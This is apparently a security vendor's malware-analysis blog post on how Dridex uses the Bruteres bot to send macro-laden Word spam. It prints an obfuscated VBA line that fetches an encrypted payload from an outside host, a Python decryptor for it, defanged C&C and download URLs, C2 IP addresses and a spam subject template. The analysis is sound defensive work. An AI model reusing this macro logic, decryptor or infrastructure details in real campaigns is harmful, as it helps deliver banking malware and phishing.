Introduction

For a few days, there has been an increasing amount of Dridex spam targeting our mailboxes. We saw previously how Dridex operators can take control of your computer, using legacy software, in order to perform malicious banking operations [1].

Today, we will trace back to the source of the problem, that is the source of the Dridex malicious emails. We will see how Dridex is able to turn one’s computer into a Dridex “.doc” spam machine by using another malware dubbed Bruteres, (Trubsil.C for Microsoft or Fidobot.A for Trendmicro).

Context

The Dridex botnet is split into several subbotnets identified by a number named “botid”. The most active botnets in Europe were the following ones:

  • The 120 botnet, that targeted France the most between June and September
  • The 200 botnet
  • The 220 botnet

After the Dridex takedown that took place in September, the Dridex command and control server was offline during several weeks. Unfortunately, a new Dridex C&C appeared at the beginning of October, quickly followed by the reappearance of the 120 and 220 botnets spam. Until now, most of the botnets activity seems to be focused on banks in the UK and South Asia. But French banks are still targeted, in particular for the stealing of website credentials.

On October 22nd, Lexsi saw the 220 botnet gave for a few seconds a download order to some of the computer in the network. The downloaded target was an executable file, as it was previously the case for Ammyy Admin[1]. Let’s have a look at the program’s behavior and see what it is all about.

First look at the file

The file we will analyze today [2] has been downloaded the 2015-10-22 by at least two infected computers of the 220 botnet. A quick look at the binary file tells us it is protected by a crypter. Good indicators of such a protection are for instance the non-standard section names or the sentences of random words inside the binary, which are typical to some obfuscators.

Lexsi dridex_packed

The obfuscation layer is by chance quite straightforward, as the original binary file quickly gets unpacked in memory at runtime. The plain-text malware we obtained is a 364 KB Delphi application most likely compiled on the 2015-08-17. It is an instance of the Bruteres/Trusbil/Fidobot malware, which has been known in the wild since at least 2013. Analyses of the Delphi types and units, using for instance the tool IDR [3], gives us a hint on what this piece of code is capable of:

Lexsi Dridex_units

At first glance, this malware seems to support many operation modes like brute forcing of web application credentials or spam. The TCmdGet type seems particularly interesting there, since it suggests this instance is able to get commands from a remote internet address. In fact, dynamic analysis of the file shows us the program communicates with its command and control server using the following urls:

  • hxxp://sprwinupdate.com/checkres.php
  • hxxp://sprwinupdate.com/cmd.php
  • hxxp://sprwinupdate.com/bruteres.php
  • hxxp://sprwinupdate.com/emailcheckres.php

The protocol used is plain HTTP and no crypto is visible there. We can thus learn a bit more about the command the malware receives by logging the HTTP traffic involving hxxp://sprwinupdate.com/cmd.php.

Spam machine

The Bruteres command protocol is really straightforward. No crypto at all is used: the malware simply gets a list of (malicious) jobs to perform from the cmd.php address. In our case, all given orders are spam requests. A spam request example is available online[4]. Every command contains the following information:

  • A list of 30 SMTP server address + stolen credential.
  • A list of 2000 spam target emails (botid-_26051.txt)
  • A list of 1000 fake senders names, most likely randomly generated (4.txt [5])
  • A Word document (36097.doc [6])
  • Several templates used to build the different spam email fields (attachment name, subject, etc.)

The next cmd.php request the malware sends gives back a different Word document (with an increasing ID number), additional SMTP credentials and 2000 additional email addresses (also with an increasing ID). The sender list was the same. If IDs are increasing step by step, we can induce that this particular spam server contains more than 5 millions spam target emailsand that more than 35000 Word documents have been generated.

If we look at the email templates, we can find the usual catchy subjects that are used in several Dridex emails:

{ACH|Wire|Quick|Fast|BillPay|International|Automated Clearing House|Domestic|SWIFT|SEPA|Overnight} {transfer|payment} {Status|Transaction Status|Transfer status|Recent Status|The Last Status|General Status|Updated Status|Changed Status|Payment Status|State}

In order to confirm that it is in fact a Dridex spam, we have to analyze the Word document first.

Word document analysis

The Word document downloaded [6] by the Bruteres malware contains obfuscated VBA macros, as the several useless lines of VBA code and the random variable names suggest. As usual for malicious Word macros, we are looking for the binary file url stored obfuscated somewhere inside the document. This command can be spotted by looking for the “Open” keyword:

KjDJbMYhykW5A.Open FZRfhv43w8Wn(Chr(217) + Chr(247) + Chr(195), "Hhv9BbfkfdivZhMax"), FZRfhv43w8Wn(Chr(246) + Chr(225) + Chr(217) + Chr(182) + Chr(145) + Chr(146) + Chr(16) + Chr(61) + Chr(13) + Chr(1) + Chr(89) + Chr(38) + Chr(43) + Chr(13) + Chr(76) + Chr(36) + Chr(35) + Chr(70) + Chr(110) + Chr(26) + Chr(26) + Chr(74) + Chr(122) + Chr(61) + Chr(16) + Chr(73) + Chr(63) + Chr(42) + Chr(86) + Chr(96) + Chr(43) + Chr(16) + Chr(125) + Chr(22) + Chr(4) + Chr(53) + Chr(58) + Chr(23) + Chr(66) + Chr(48) + Chr(16) + Chr(51) + Chr(44), "CCe1BT9Rja2"), False

It looks like Dridex slightly improved the obfuscation used in this document, as the use of the cipher functionFZRfhv43w8Wn(data, key) suggests. This method, defined at the end of the macro module, is of course obfuscated too. A manual analysis allows us to recover its code and reimplement it in python:

def decrypt(data, key):
    key = map(ord, key)
    array2 = range(256)
    array2.extend(range(0, 286-256))
    ubound = len(key)-1
    for i in range(1,7):
        array2[i+249] = key[ubound-i]
        array2[i-1] = key[i-1] ^ (255-key[ubound-i])
    res = []
    i = 0
    t = 0
    f = False
    for c in data:
         if t > 285:
             t = f and 5 or 0
             f = not f
         c = ord(c) ^ key[i%len(key)] ^ array2[t]
         i += 1
         t += 1
         res.append(c)
    return "".join(map(chr, res))

If we apply this python function to the arguments present in the VBA line we saw previously, the binary download address appears:

  • hxxp://hoiandesign.com/images/_notes/p0.jpg

This is something new: not only the “.jpg” file extension make its first appearance for Dridex documents (at least to the best of our knowledge), but the referenced file seems encrypted. By exploring the VBA macros further, one is able to get more clues about the used cipher:

EEzEUbNHYfhr XW4QKucq4Ih, FZRfhv43w8Wn(StrConv(KjDJbMYhykW5A.resPonsebodY, vbUnicode), 
    FZRfhv43w8Wn(Chr(196) + Chr(169) + Chr(254) + Chr(205) + Chr(253) + Chr(136) + Chr(87), "RBfBPOfWe9xe"))

The content of the downloaded file (resPonsebodY) is in fact decrypted using the cipher function analyzed previously. The cipher key is the string “Coded87”. Once the file is decrypted, the final binary file appears. Unsurprisingly, it is the first stage of the Dridex binary[7].

In order to get the analysis a bit further, it could be interesting to have a quick look at this first stage program. We saw in a previous blog post[8] how to retrieve the static configuration from a Dridex sample. By using this method on this binary (once deobfuscated of course), the following initial configuration appears:

<config botnet="301"> <server_list> 46.37.1.88:473 91.142.221.195:5445 198.89.98.212:3443 </server_list> </config>

What we downloaded is in fact a botnet 301 sample ! Judging by the analysis of the dynamic configuration (the web injects) of this botnet and by the spam target emails, this particular botnet seems to target north America.

Conclusion

Once again, Dridex seems to use external software in order to achieve its malicious goals. By using a rather simple malware, Bruteres, the botnet is able to send millions of trapped emails. By analysing this malware, we wera able to see how Dridex actually builds and sends all these emails using infected computers.

If wou detect suspicious SMTP traffic in your network, it can be the sign of a Dridex infection. In any case, don’t hesitate to contact our incident response team for any assistance regarding Dridex infection [9].

Références

[1]https://www.lexsi.com/securityhub/dridex-ammyy-admin-post-infection-move/?lang=en
[2]https://www.virustotal.com/fr/file/d34a55b669d2f80ed379d46aa7581fd7a648a931059c002444ce44c3dd6f31bf/analysis/
[3]http://kpnc.org/idr32/en/index.htm
[4]http://pastebin.com/93nPZhQY
[5]http://pastebin.com/nyVeKjP4
[6]https://www.virustotal.com/fr/file/d3000190a55a197da1401dcf3dfdc84ca729a633ac5c7af7124f2b3ca09ae344/analysis/
[7]https://www.virustotal.com/fr/file/b029113af448c4055bd101cd7397820b21dbfef19b3dfd7e7f0f77fdeef9c3ee/analysis/
[8]https://www.lexsi.com/securityhub/dridex-tests-new-lnk-email-attachments/?lang=en
[9]https://www.lexsi.com/en/emergency-contact